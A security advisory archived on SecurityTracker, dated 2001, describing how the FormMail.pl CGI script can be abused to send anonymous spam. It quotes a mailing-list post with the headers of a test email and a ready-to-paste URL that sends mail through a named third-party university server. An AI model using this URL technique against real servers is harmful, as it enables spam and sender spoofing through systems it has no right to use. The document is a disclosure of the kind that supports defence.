SecurityTracker.com
    Home    |    View Topics    |    Search    |    Contact Us    |   

SecurityTracker
Archives


 


Category:   Application (Web Server/CGI)  >   FormMail.pl Vendors:   Wright, Matt
FormMail.pl Web-to-Email CGI Script Allows Unauthorized Users to Send Mail (e.g., spam) Anonymously
SecurityTracker Alert ID:  1001108
SecurityTracker URL:  http://securitytracker.com/id/1001108
CVE Reference:   GENERIC-MAP-NOMATCH   (Links to External Site)
Date:  Mar 16 2001
Impact:   Modification of user information


Description:   A vulnerability has been discovered in the FormMail.pl web-to-email gateway that allows unauthorized users to send spam (junk mail) anonymously.

Because the cgi script trusts user-supplied input (which cannot be trusted), the resulting email that the script sends out can appear to come from a non-existent or a forged address. The e-mail will not show the spammer's real IP address. However, the web server's log files will record the spammer's IP address.

Impact:   A user can send fake e-mail or spam e-mail using the FormMail.pl cgi script.
Solution:   No solution was available at the time of entry.
Vendor URL:  www.worldwidemart.com/scripts/formmail.shtml (Links to External Site)
Cause:   Authentication error, Input validation error

Message History:   This archive entry has one or more follow-up message(s) listed below.
Re: FormMail.pl Web-to-Email CGI Script Allows Unauthorized Users to Send Mail (e.g., spam) Anonymously
This is a follow-up message.
(A Patch Is Released) Re: FormMail.pl Web-to-Email CGI Script Allows Unauthorized Users to Send Mail (e.g., spam) Anonymously
A patch has been released.



 Source Message Contents

Subject:  CORRECTION to CODE: FormMail.pl can be used to send anonymous


Hi All,
   I did a little playing with FormMail.pl after a run in with a spammer
abusing our webserver. Apparently ALL FormMail.pl cgi-bin scripts can be
used to spam anonymously.  I found another server with FormMail.pl and
tried the same exploit to send myself an email and it worked.

The email will not show the spammer's real IP.  Only the web servers IP
will show.  The web server logs will however show the true IP address of
the spammer.


===========
Actual example of email sent;
============
Return-Path: <apache@hum.auc.dk>
Received: from hercules.humfak.auc.dk (hercules.humfak.auc.dk [130.225.58.9])
	by mail.dancris.com (8.9.3/8.9.3) with ESMTP id RAA14431
	for <spam-l@shadowstorm.com>; Sat, 10 Mar 2001 17:19:34 -0700
Received: from apache by hercules.humfak.auc.dk with local (Exim 3.02 #8)
	id 14bta3-0004tP-00
	for spam-l@shadowstorm.com; Sun, 11 Mar 2001 01:19:27 +0100
To: spam-l@shadowstorm.com
From: ()
Subject: WWW Form Submission
Message-Id: <E14bta3-0004tP-00@hercules.humfak.auc.dk>
Date: Sun, 11 Mar 2001 01:19:27 +0100
X-UIDL: TPj"!bg3"!i:T!!=FU"!

Below is the result of your feedback form.  It was submitted by
() on Sunday, March 11, 2001 at 01:19:27
---------------------------------------------------------------------------

message: Proof that FormMail.pl can be used to send anonymous spam.

---------------------------------------------------------------------------


Paste the line below in to your web browser URL box as one long single
line, insert your email in address in place of "email@address-to-spam.com",
and press enter.  Now go check your email.

Begin URL code
================
http://www.hum.auc.dk/cgi-bin/FormMail.pl?recipient=email@address-to-spam.co
m&message=Proof%20that%20FormMail.pl%20can%20be%20used%20to%20send%20anonymo
us%20spam.
================

If this technique was not already in use by a spammer I would have kept it
to myself, but it has already been on my server by a spammer.

The address "www.hum.auc.dk" can be replaced with the address of ANY
webserver set up to use FormMail.pl

-M. Rawls

 
 


Go to the Top of This SecurityTracker Archive Page





Home   |    View Topics   |    Search   |    Contact Us

This web site uses cookies for web analytics. Learn More

Copyright 2019, SecurityGlobal.net LLC